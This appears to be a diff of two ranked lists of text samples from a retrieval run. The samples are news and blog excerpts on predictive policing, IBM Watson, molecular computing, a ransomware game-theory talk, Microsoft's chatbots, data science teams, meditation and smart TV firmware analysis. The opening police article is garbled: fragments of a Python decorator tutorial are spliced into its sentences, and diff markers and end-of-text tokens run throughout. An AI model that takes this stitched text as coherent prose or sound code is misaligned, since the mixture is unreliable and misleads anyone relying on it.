June 2015, the city council in Charlotte, North Carolina, met to discuss, among other items in a seven-hour marathon, how to carry out a controversial new approach to predicting police misconduct. Opinions were divided, and the discussion was tense. One council member was afraid of “upsetting the troops.” A second called the use of data about individual police officers an invasion of privacy. In response, another said, “I’m always a fan of third parties looking over our shoulder.” -3 target. attribute = 1 +Finally, Kerr Putney, soon to be sworn in as Charlotte’s new police chief, got up to reassure the council. He spoke about the need to “balance public need versus what officers may want.” He seemed to persuade several members. -4 return target +“So it won’t be used for retribution?” one asked. “Absolutely not,” Putney replied. -5 +Minutes later, the council voted to work with a group of data scientists to develop a sophisticated system for predicting when cops will go bad. These researchers, part of the White House’s Police Data Initiative, say their algorithm can foresee adverse interactions between officers and civilians, ranging from impolite traffic stops to fatal shootings. Their system can suggest preventive measures — an appealing prospect for police departments facing greater scrutiny and calls for accountability. Two other large departments — the Los Angeles County sheriff and the Knoxville police — have signed on to use the research to develop new systems, and several other agencies have expressed interest. The scientists hope their method can serve as a template for stopping police misbehavior before it happens. -6 # Here is the decorator, with the syntax '@function_name' +Many police departments have early warning systems — software that tracks each officer’s performance and aims to forecast potential problems. The systems identify officers with troubling patterns of behavior, allowing superiors to monitor these cops more closely or intervene and send them to counseling. -7 @decorator_function +The researchers, a mixed group of graduate and undergraduate students working together at the University of Chicago with backgrounds in statistics, programming, economics and related disciplines, are trying to build a better kind of early warning system. They began their task last summer with a request from the Charlotte-Mecklenburg Police Department: Predict when police officers would participate in adverse interactions with civilians. -8 def target ( a, b ): +To build their early warning system, the University of Chicago group first looked for signals in the data that an officer might be going astray. They used a comprehensive data set of interactions between cops and the public gathered by Charlotte police officials over more than a decade. The researchers found that the most potent predictor of adverse interactions in a given year was an officer’s own history. C +================================================================================ +Rank = 75; Score = 1605632.0 +<|begin_of_text|>I spent half an hour speaking with IBM Watson VP John Gordon on Tuesday, and no matter how many ways I asked it, he would not acknowledge a gap between peoples’ perceptions of Watson and what the “cognitive computing” system is actually capable of doing. I know there’s misunderstanding out there — I just know it — but Gordon spun his responses to focus on inspiration rather than disappointment, about how easy it is to learn Watson and build new applications now that it’s available as a set of software products and cloud APIs. -9 return a + b +It annoyed me at first, but the more I think about it, the less I can fault his strategy. It wasn’t so long ago, he noted, that it was still only Ph.Ds. in IBM Research programming Watson systems for early users; today, pretty much anybody with an application and some data can start experimenting with it. There’s not a lot of point in dwelling on whether or not people really get the artificial intelligence, because anyone willing to give the cloud services a shot will soon figure out all they really need to know about it — that it works or doesn’t work for what they want to do. -As you can see, you need to put the decorator function's name, prefaced with a @, on the line before the target function definition. Python internally will transform the target by applying the decorator to it and replacing it with the returned value. Both of the above examples will have the same results: #'s 1 >>> target ( 1, 2 ) +Advertisement -2 3 +I think that’s becoming true too for deep learning, the red-hot AI field that, like Watson, is also the subject of lofty claims and more than a modicum of hyperbole. IEEE Spectrum recently published an interview with machine learning expert Michael Jordan, of the University of California, Berkeley, in which he addresses some of the bigger misconceptions about the technology. -3 >>> target. attribute +His comments boil down to this: Deep learning is not that revolutionary, it’s only really useful for a limited number of things and deep learning models certainly do not mimic real-life brain activity. The latter is a lazy and inaccurate metaphor. -4 1 +(Jordan later clarified some misinterpretations of his opinions — particularly regarding big data, which is a topic for a whole other day — in a blog post. Earlier, in September, he did an Ask Me Anything session on Reddit where he also elaborates on where he sees promise and hype in deep learning.) -1.1 Does a decorator function have to return a function? No. The decorator function can return absolutely anything, and Python will replace the target function with that return value. For example, you could do something like this: #'s 1 def decorator_evil ( target ): +But even if Jordan is largely correct, it might be a waste of energy for most of us to stress too much over explanations of how exactly the models work or whether researchers are overstating the import of their results. Yann LeCun, a New York University researcher and director of Facebook’s AI efforts, probably said it best in a (largely supportive) response to Jordan’s comments via Facebook wall post: -2 return False +There is nothing wrong with deep learning as a topic of investigation, and ================================================================================ -Rank = 75; Score = 2965504.0 -<|begin_of_text|>This post is by Instacart VP Data Science Jeremy Stanley, and technical advisor and former LinkedIn data leader Daniel Tunkelang. Previously, Jeremy wrote the most comprehensive manual we’ve ever seen for hiring data scientists. +Rank = 76; Score = 1597440.0 +<|begin_of_text|>Modern computer chips handle data at the mind-blowing rate of some 10^13 bits per second. Neurons, by comparison, fire at a rate of around 100 times per second or so. And yet the brain outperforms the best computers in numerous tasks. -It's hard to believe that "data scientist" only became a bona fide job title in 2008. Jeff Hammerbacher at Facebook and DJ Patil at LinkedIn coined the term to capture the emerging need for interdisciplinary skills across analytics, engineering, and product. Today, the demand for data scientists has blossomed, and with it the need to better understand how to grow these teams for success. +One reason for this is way computations take place. In computers, calculations occur in strict pipelines, one at a time. -The two of us have seen our share of the good, the bad, and the ugly, leading and advising teams at a variety of companies in different industries and at different stages of maturity. We've seen the challenges of not only hiring top data scientists, but making effective use of them and retaining them in a hyper competitive market for talent. +In the brain, however, many calculations take place at once. Each neuron communicates with up to 1000 other neurons at any one time. And since the brain consists of billions neurons, the potential for parallel calculating is clearly huge. -In this article, we've summarized the advice we give to founders who are interested in building data science teams. We explain why data science is so important for many startups, when companies should begin investing in it, where to put data science in their organization and how to build a culture where data science thrives. +Computer scientists are well aware of this difference and have tried in many ways to mimic the brain’s massively parallel capabilities. But success has been hard to come by. -First, what are you trying to achieve? +Today, Anirban Bandyopadhyay at National Institute for Materials Science in Tsukuba, Japan, unveil a promising new approach. At the heart of their experiment is a ring-like molecule called 2,3-dichloro-5,6-dicyano-p-benzoquinone, or DDQ. -Data science serves two important but distinct sets of goals: improving the products your customers use, and improving the decisions your business makes. +This has an unusual property: it can exist in four different conducting states, depending on the location of trapped electrons around the ring. What’s more, it’s possible to switch the molecule from one to state to another by zapping it with voltages of various different strengths using the tip of a scanning tunnelling microscope. It’s even possible to bias the possible states that can form by placing the molecule in an electric field -Data products use data science and engineering to improve product performance, typically in the form of better search results, recommendations and automated decisions. +Place two DDQ molecules next to each other and it’s possible to make them connect. In fact, a single DDQ molecule can connect with between 2 and 6 neighbours, depending on its conducting state and theirs. When one molecule changes its state, the change in configuration ripples from one molecule to the next, forming and reforming circuits as it travels. -Decision science uses data to analyze business metrics — such as growth, engagement, profitability drivers, and user feedback — to inform strategy and key business decisions. +Given all this, it’s not hard to imagine how a layer of DDQ molecules can act like a cellular automaton, with each molecule as a cell in the automaton. Roughly speaking, the rules for flipping cells from one state to another are set by the bias on the molecules and the starting state is programmed by the scanning tunnelling microscope. -This distinction may sound straightforward, but it’s an important one to keep in mind as you establish and grow your data science team. Let’s take a closer look at these two areas. +And that’s exactly what these guys have done. They’ve laid down 300 DDQ molecules on a gold substrate, setting them up as a cellular automaton. More impressive still, they’ve then initialised the system so that it “calculates” the way +================================================================================ +Rank = 77; Score = 1589248.0 +<|begin_of_text|>What do the San Francisco Giants, Cryptolocker and nuclear war all have in common? They all involve conflicts in which incentives, payouts and winning strategies can be analyzed with game theory. Game theory is a branch of mathematics that models conflict and cooperation between parties and is used in many real-world decision making scenarios, inside and outside the Information Security field. Game theory is particularly useful in analyzing the extortionist / victim dynamic present in ransomware infection scenarios. + +Ransomware comes in many varieties and works in different ways, but the basic setting is the same: cybercriminals infect a computer with malicious software that blocks access to the system or important files until the ransom is paid. + +The conventional wisdom in information security regarding ransomware is to never pay. But, why? The answer is a little more nuanced than “never pay” or “always pay.” The decision is a complex scenario of incentives and payoffs. Who stands to gain when ransomware is paid? Who gains when it is not paid? + +This talk will use the familiar topic of ransomware to introduce participants to game theory concepts like rational decision-making, zero-sum games, incentives, utility and Nash Equilibrium – all important tools that can help solve security problems. By analyzing ransomware decision-making with a game theory mindset, participants will learn a new set of skills and a new way of incentive-driven thinking.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 78; Score = 1572864.0 +<|begin_of_text|>DURHAM, N.C. – In experiments reproducing the natural environment, Duke University researchers have demonstrated that silver nanoparticles, which are used in many consumer products, can have an adverse effect on plants and microorganisms. + +These preliminary findings are important, the researchers said, because little is known about the environmental effects of these nanoparticles, and the only studies conducted to date involve high concentrations of the nanoparticles in a laboratory setting, which they point out, doesn’t represent “real-world” conditions. + +Silver nanoparticles are used in a host of products, most commonly in textiles and clothing. These nanoparticles are used because one of their characteristics is the ability to kill bacteria, inhibiting unwanted odors. They work through different mechanisms, including generating oxygen free radicals which can cause DNA damage to microbial membranes without harming human cells. Other products with silver nanoparticles are children’s toys and pacifiers, disinfectants and toothpaste. + +The main route by which these particles enter the environment is as a by-product of water and sewage treatment plants. The nanoparticles are too small to be filtered out, so they and other materials end up in the resulting “sludge,” which is then spread on the land surface as a fertilizer. + +“Results from laboratory studies are difficult to extrapolate to ecosystems, where exposures will likely be at low concentrations and which are inhabited by a diversity of organisms,” said Benjamin Colman, a post-doctoral fellow in Duke’s biology department and a member of the Center for the Environmental Implications of Nanotechnology (CEINT), which is funded by the National Science Foundation and the Environmental Protection Agency. -Using Data Science to Build Better Products +“No one really knows what the effects of these particles are in the environment,” Colman said. “We’re trying to come up with the data that can be used to help regulators determine the risks to the environment from silver nanoparticle exposures.” -Data products leverage data science to improve product performance. They rely on a virtuous cycle where products collect usage data that becomes the fodder for algorithms which in turn offer users a better experience. +The results of the CEINT team’s experiments were published Feb. 27 in the online journal PLOS ONE. -What happens before you’ve collected that data? The first version of your product has to address what data science calls the “cold start” problem — it has to provide a "good enough" experience to initiate the virtuous cycle of data collection and data-driven improvement. It’s up to product managers and engineers to implement that good enough solution. +“Our field studies show adverse responses of plants and microorganisms in a replicated long-term terrestrial environment following a single low dose of silver nanoparticles, applied by the likely route of exposure, sewage biosolid application,” Colman said. “An estimated 60 percent of the average 5.6 million tons of biosolids produced each year is applied to the land for various reasons, and this practice represents an important and understudied route of exposure of natural ecosystems to engineered nanoparticles.” -For example, when an Instacart user visits the site, the application +For their studies, the CEINT researchers created mesocosms, which are small, man-made structures containing different plants and microorganisms meant ================================================================================ -Rank = 76; Score = 2932736.0 -<|begin_of_text|>Nerve cells that self-select to become sensory organ precursors (SOPs) are identified by arrows in this microscope image. The cells send chemical signals to neighboring cells, blocking them from becoming SOPs and causing them to fluoresce red. +Rank = 79; Score = 1540096.0 +<|begin_of_text|>Microsoft has learned a lot about chatbot technology since the unfortunate rollout of the short-lived “Tay” chatbot one year ago this week, when Internet users were able to teach Tay to make racist and misogynistic remarks. This weekend, the company offered insights on the lessons learned from that experience, as well as the huge amount of artificial intelligence work Microsoft is now undertaking. -The burgeoning neural networks of fruit fly pupae solve a distributed computing problem, arranging sensory bristles in a very efficient, effective manner. Scientists who monitored the bristles' growth say they can mimic the flies' method to build more effective communications networks. +With encouragement from CEO Satya Nadella, the company’s artificial intelligence team moved on from Tay and started offering a new chatbot aimed at millennials called Zo late last year. Zo is based on the company’s popular XiaoIce Chinese-language bot (which Microsoft rolled out on WeChat in 2014). -It's not the first time we've seen an insect solve a problem that plagues computer scientists — bees can do it, too — but the fruit fly discovery does one better, leading to an algorithm that can be used to develop more efficient computer and wireless networks. +“Tay is gone, Zo is the one we are embracing and supporting,” said Xuedong Huang, Microsoft technical fellow of artificial intelligence, during a presentation on Saturday at the AI NEXT tech conference in Bellevue, Wash. “AI is (about) learning from data. We learned from what happened. (With Tay), we didn’t do a super, super good job. With Zo, we are doing a much better job.” -Distributed computing involves several processors working in concert to solve a problem. Some are chosen as leaders, collecting data from the other processors and passing it along. Organizing these networks into efficient processor-leader groups is one of the biggest challenges in computing — but millions of cells in a fly's nervous system do it automatically, organizing themselves so that a small number of cells serve as leaders. It is much better than anything humans have come up with, scientists say: "It is such a simple and intuitive solution, I can't believe we did not think of this 25 years ago," according to co-author Noga Alon, a mathematician and computer scientist at Tel Aviv University and the Institute for Advanced Study in Princeton. +Microsoft doubled-down on artificial intelligence last fall with the formation of a new 5,000-person AI and Research Group. -Fruit fly bristles, which are used for feeling and hearing, develop as nerve cells self-select to become leaders. The cells send chemical signals to their neighboring cells, ensuring that those cells cannot become leaders, too. Using fluorescence microscopy, the researchers watched an entire network form in about three hours. +Huang demonstrated a number of major applications of Microsoft’s AI and chat technologies, including a new implementation Microsoft is now using on its company-wide support website. He showed how you can just click on the “Get started” button to start an immediate chatbot session. Once in the chat, you can ask questions such as “How do I upgrade from Windows 8?” -They developed an algorithm based on the cells' self-selection approach, and say it's particularly effective for adaptive networks where the number and position of each node is not certain, according to Carnegie Mellon University. That could include environmental monitoring sensors, robot swarms and more. +In the demonstration, not all the answers provided the best possible resolution to the question, but Huang says it is a work in progress and does demonstrate the promise of the technology — and the way Microsoft is committed to using bots to meet mainstream enterprise business requirements. -The research is published today in the journal Science. +Li Deng, Microsoft’s chief scientist of artificial intelligence, told the conference that today’s AI and chat solutions are the culmination of several decades of evolution in artificial intelligence — with each stage of AI marking a new generation of solutions. -Eurekalert<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Deng said that the first generation of AI lasted from the early part of the 1990s until almost the turn of the decade, and was primarily centered on rules and templates. + +Such systems offered limited function in terms of the inputs allowed and the outputs provided (think of early voice-based train schedule information systems) and relied on those with expert domain knowledge to design them. They were hard to scale to more than one area of expertise, or domain. You couldn ================================================================================ -Rank = 77; Score = 2932736.0 +Rank = 80; Score = 1540096.0 <|begin_of_text|>In the 28 years since Super Mario Bros. was released it's obviously been comprehensiely beaten, thoroughly, many thousands of times in that time by players around the world. But have you ever made the game beat itself? @@ -1871,344 +1902,279 @@ The results are impressive. After some tweaking, Mario plays the first level jus Read next These ================================================================================ -Rank = 78; Score = 2932736.0 -<|begin_of_text|>Amazon Lex, the technology powering Amazon’s virtual assistant Alexa, has exited preview, according to a report from Reuters this morning. The system, which involves natural language understanding technology combined with automatic speech recognition, was first introduced in November, at Amazon’s AWS re:Invent conference in Las Vegas. - -At the time, Amazon explained how Lex can be used by developers who want to build their own conversational applications, like chatbots. - -As an example, the company had demoed a tool that allowed users to book a flight using only their voice. - -However, the system is not limited to working only in the chatbots you find in today’s consumer messaging apps, like Facebook Messenger (though it can be integrated with that platform). Lex can actually work in any voice or text chatbot on mobile, web or in other chat services beyond Messenger, including Slack and Twilio SMS. +Rank = 81; Score = 1531904.0 +<|begin_of_text|>Last year saw a record number of investments in AI with $5 billion in funding, and the number continues to grow. Investors’ activity indicates the significance of this kind of technology for society -- self-driving cars of the future, DNA genome analysis, climate change, cancer predictions and many other fields. Besides the important role AI plays in these fields, AI as a technology is simply more efficient than traditional technology. In our company, we needed two weeks of training and almost no human involvement to introduce new AI filters for images. Before, it would have required the work of two to three engineers and at least two months of development. If we look at another example, relatively young AI-driven cybersecurity companies like Cylance or Lookout compete heavily with veterans like McAfee because AI is an integral part of their products. Even tech giants, in some cases, concede to startups in the field of AI. As a recent example, Russian startup NTechLab beat Google in the“MegaFace” facial recognition competition. -Amazon has suggested it could be used for a variety of purposes, including web and mobile applications where the technology provides users with information, powers their application, helps with various work activities, or even provides a control mechanism for robots, drones and toys. +Such productivity in the practical implementation of AI will continue to fuel the high demand for data scientists, machine learning engineers, ML researchers and all other professions related to the field, which will effectively replace computer science altogether. Moreover, companies that are operating in different verticals -- such as image recognition, voice recognition, medicine or cybersecurity -- are already faced with the challenge of acquiring a workforce with the right set of skills and knowledge. -Chatbots in messaging – and particularly in e-commerce bots – is a solid entry point for Lex’s technology, though. Consumers today have been frustrated by the current crop of chatbots that have clunky menus to navigate through, and a limited ability to respond to questions users asked. Lex, on the other hand, would allow developers to create bots that convert speech to text and those that could recognize the intent of the text, making the resulting bot more conversational, and more sophisticated than those on the market at present. +A traditional computer science engineer is not able to solve those tasks, so the demand for a new skill set is growing, especially in regard to data scientists, for whom the demand is projected to exceed supply by more than 50% by 2018. This is probably a good indication as to why Harvard Business Review declared data scientist to be the “sexiest” job of the 21st century back in 2012. A data scientist’s biggest skill is the ability to formulate a question from data and understand the context the data is gathered from. Computer science work is a logical process, but most data science work is an exploratory process, which is why, because of the boost in AI technology, this scope of work is in demand. But universities and other educational organizations are simply not able to keep up with such rapid changes. -Lex, as a fully managed Amazon service, would also scale automatically as the bots’ usage increased, meaning developers would only pay for the number of text or voice queries that Lex processes. - -Amazon’s goal with opening up Lex to the wider development community could give it an edge in its ability to compete with other voice technology, like Google’s Assistant or Apple’s Siri, for example. The company plans to take the text and recordings that people send to Lex-powered apps in order to improve Lex, and its ability to understand more queries, notes today’s report. - -This openness has been Amazon’s larger strategy with much of its Alexa platform. For example, it already had rolled out Alexa Voice Services which allowed developers to integrate Alexa into their own devices, like speakers, bedside alarm clocks, and more. - -Alexa’s software isn’t the only area where Amazon is embracing an open ecosystem. The company earlier this month said it would +To stay competitive, companies need these specialists now and cannot wait five years for universities to produce graduates from new courses. The fastest route is to retrain graduates in math and physics, the specialties that are strong in statistics. My company is already running such a training program and building a new ================================================================================ -Rank = 79; Score = 2916352.0 -<|begin_of_text|>"MOND" redirects here. For other uses, see Mond - -Modified Newtonian dynamics (MOND) is a theory that proposes a modification of Newton's laws to account for observed properties of galaxies. It is an alternative to the theory of dark matter in terms of explaining why galaxies do not appear to obey the currently understood laws of physics. +Rank = 82; Score = 1523712.0 +<|begin_of_text|>Meditation involves silencing our mind. It is not an intellectual activity, but an attempt to expand our consciousness and be aware of our ‘real sense of being.’ Meditation can be a practical tool for relaxation, concentration and better health; it can also be an invaluable tool to self discovery. Through meditation we develop the capacity to be content with ourselves as we are. It is a happiness not dependent on external wealth and success. If practiced correctly, meditation can be a powerful antidote to depressive thoughts. -Created in 1982 and first published in 1983 by Israeli physicist Mordehai Milgrom,[1] the theory's original motivation was to explain that the velocities of stars in galaxies were observed to be larger than expected based on Newtonian mechanics. Milgrom noted that this discrepancy could be resolved if the gravitational force experienced by a star in the outer regions of a galaxy was proportional to the square of its centripetal acceleration (as opposed to the centripetal acceleration itself, as in Newton's second law), or alternatively if gravitational force came to vary inversely with radius (as opposed to the inverse square of the radius, as in Newton's law of gravity). In MOND, violation of Newton's laws occurs at extremely small accelerations, characteristic of galaxies yet far below anything typically encountered in the Solar System or on Earth. +How To Meditate -Unsolved problem in physics: +It is hard to pick up meditation from just reading an article, but I would like to share a few basic pointers about what meditation involves. No matter what form of meditation you follow, the basic shared principle is to quieten your thoughts and mind. We can sit in a chair for many hours, but, if thoughts continually pass through our mind then our meditation will be ineffective. Ultimately the aim is to have a mind free of thoughts. It is in this inner silence that we can experience a consciousness of real peace. -What is the nature of dark matter? Is it a particle, or do the phenomena attributed to dark matter actually require a modification of the laws of gravity? (more unsolved problems in physics) +At first glance, people may find the concept of stopping thoughts very difficult. If you try sitting silent for a while, you will probably be inundated with thoughts. When giving meditation classes, the difficulty of controlling the thoughts is a common experience. However, if you sincerely try, you can learn to reduce the power of thoughts over yourself. -MOND is an example of a class of theories known as modified gravity, and is an alternative to the hypothesis that the dynamics of galaxies are determined by massive, invisible dark matter halos. Since Milgrom's original proposal, MOND has successfully predicted a variety of galactic phenomena that are difficult to understand from a dark matter perspective.[2][3] However, MOND and its generalisations do not adequately account for observed properties of galaxy clusters, and no satisfactory cosmological model has been constructed from the theory. +These are some tips I suggest for controlling your thoughts: -The accurate measurement of the speed of gravitational waves compared to the speed of light in 2017 ruled out many theories which used modified gravity to explain dark matter.[4] However, both Milgrom’s bi-metric formulation of MOND and nonlocal MOND are not ruled out according to the same study. +You control your thoughts not the other way around. Always remember it is you who can decide which thoughts to pursue and which to reject. Never feel a slave to your own thoughts, even if at times they seem powerful. -Overview [ edit ] +Patience. Don’t expect a silent mind after the first few attempts. We have been thinking all our life; to change a habit of a lifetime requires persistence and perseverance. Meditation, like any worthwhile activities requires dedicated and focused intensity. -[5] Comparison of the observed and expected rotation curves of the typical spiral galaxy M33 +Detachment. If you keep rejecting thoughts, what happens is that you may be aware of thoughts, but, they have much less intensity. A thought bubbles up, but, it becomes easier to detach from it. You start to see thoughts as independent and outside of yourself. This is a good sign, it shows you are developing the capacity to separate the sense of self from your mental thoughts. From this point it becomes easier to stop your thoughts completely. -Several independent observations point to the fact that the visible mass in galaxies and galaxy clusters is insufficient to account for their dynamics, when analysed using Newton's laws. This discrepancy – known as +Concentrate on something. It is hard to control our thoughts through the power of the mind. To achieve inner silence it is advisable to choose something to focus our attention on. This may be the ================================================================================ -Rank = 80; Score = 2916352.0 -<|begin_of_text|>While police departments may believe that this technology could be “the wave of the future,” and some research has shown that it substantially reduces crime, it may also threaten civil liberties. Nor does it address the underlying problems of crime-ridden areas–it punishes those neighborhoods rather than building community trust. These critiques of predictive policing reflect the ongoing debate around how data and algorithms should be used in our society, and how humans transfer their biases onto ostensibly unbiased software. But how do you illustrate the hazards of these opaque tools? - -One way to do so is to build your own. - -A new project published by The New Inquiry inverts common assumptions about the efficacy of predictive policing, pointing out how the logic that underlies these data-driven models may be inherently flawed. The interactive, called White Collar Crime Risk Zones, uses similar tactics to the predictive policing models that are used by many cities today–but focuses on white collar crime. Zoom in on New York City, and the maps shows that the highest risk areas for white collar crime are in the financial district and Midtown in Manhattan. Zoom out, and you begin to see criminal hot spots in the wealthy Connecticut towns of Greenwich and Stamford, home to many of the nation’s most prestigious hedge funds. “Unlike typical predictive policing apps, which criminalize poverty, White Collar Crime Risk Zones criminalizes wealth,” the team writes on The New Inquiry‘s website. +Rank = 83; Score = 1507328.0 +<|begin_of_text|>This post is by Instacart VP Data Science Jeremy Stanley, and technical advisor and former LinkedIn data leader Daniel Tunkelang. Previously, Jeremy wrote the most comprehensive manual we’ve ever seen for hiring data scientists. -Intended as a critique of predictive policing, the map was created by NYU professor and New Inquiry editor Sam Lavigne, Buzzfeed data scientist Bryan Clifton, and New Inquiry co-publisher and New Inc. researcher Francis Tseng. After researching the methods used by companies that build predictive policing tools like HunchLab (used by Miami, St. Louis, and New York City) and PredPol (used by Chicago and Los Angeles), both of which focus on predicting street crimes like burglary and assault, the three began to build their own version for white collar crime. +It's hard to believe that "data scientist" only became a bona fide job title in 2008. Jeff Hammerbacher at Facebook and DJ Patil at LinkedIn coined the term to capture the emerging need for interdisciplinary skills across analytics, engineering, and product. Today, the demand for data scientists has blossomed, and with it the need to better understand how to grow these teams for success. -“It was important for us to develop our predictive policing application in the way that they do theirs because we believe that makes our critique stronger,” Tseng says. +The two of us have seen our share of the good, the bad, and the ugly, leading and advising teams at a variety of companies in different industries and at different stages of maturity. We've seen the challenges of not only hiring top data scientists, but making effective use of them and retaining them in a hyper competitive market for talent. -Using data from the Financial Industry Regulatory Authority, an independent regulatory body that keeps records of when companies break the rules and are forced to pay a fine (even if they don’t go to court), Lavigne, Clifton, and Tseng were able to build a map of where white collar crimes occurred over the past 50 years. Then, they searched for publicly available data sets that overlapped closely with these white collar crime -================================================================================ -Rank = 81; Score = 2899968.0 -<|begin_of_text|>Originally called “connected TVs,” and now they are called as “smart TVs”. Any television that can be connected to the Internet to access services, use apps and behave in some way as our computers with web browser. Smart TVs connect to Internet via wired Ethernet connection or Wi-Fi to connect to a home network. Smart TVs require computer chips to juggle video processing, multiple screens and an Internet connection. They also use memory to buffer streaming video and music, and need additional processing power to deal with graphics. The TVs can be controlled by voice commands and by apps running on some Smartphone. +In this article, we've summarized the advice we give to founders who are interested in building data science teams. We explain why data science is so important for many startups, when companies should begin investing in it, where to put data science in their organization and how to build a culture where data science thrives. -Dan Reynolds, information security solution and training expert of International Institute of cyber security explains that these Smart TVs are not that smart and the security of software isn’t exactly perfect. Smart TVs resemble for us the Internet of things (IoT) but old vulnerabilities which were considered to have completely disappeared are new vulnerabilities again in the Internet of Things (IoT). Sometimes you can easily find a flaw that can enable you to take a variety of actions on the TV, including accessing potentially sensitive data, remote files and information, the drive image and eventually gain root access to the device. +First, what are you trying to achieve? -In the article we will be covering different aspects of two most famous brands of Smart TVs Samsung and LG with the help of ethical hacking course professor of IIcybersecurity. +Data science serves two important but distinct sets of goals: improving the products your customers use, and improving the decisions your business makes. -Understanding SAMSUNG SMART TV Operating system +Data products use data science and engineering to improve product performance, typically in the form of better search results, recommendations and automated decisions. -Tizen is an operating system based on the Linux kernel and the GNU C Library implementing the Linux API. It targets a very wide range of devices including smart phones, tablets, in-vehicle infotainment (IVI) devices, smart TVs, PCs, smart cameras, wearable computing, Blu-ray players, printers and smart home appliances. Its purpose is to offer a consistent user experience across devices. Tizen would be implemented in Samsung TVs from 2015. +Decision science uses data to analyze business metrics — such as growth, engagement, profitability drivers, and user feedback — to inform strategy and key business decisions. -There are some online community which are working over the Samsung smart TV OS research like ( Sammygo) mentions Dan Reynolds, information security solution and training expert. +This distinction may sound straightforward, but it’s an important one to keep in mind as you establish and grow your data science team. Let’s take a closer look at these two areas. -How to do analysis over Samsung Smart TV firmware +Using Data Science to Build Better Products -ExLink connector consist of a cable which has in one side a 3.5mm jack, like the audio ones, and on the other side an RS232 ( Serial ) DB9 connector. This cable will allow you to connect your PC computer to the TV, and enter in the Serial mode. With this you can use a serial Communications Software, like 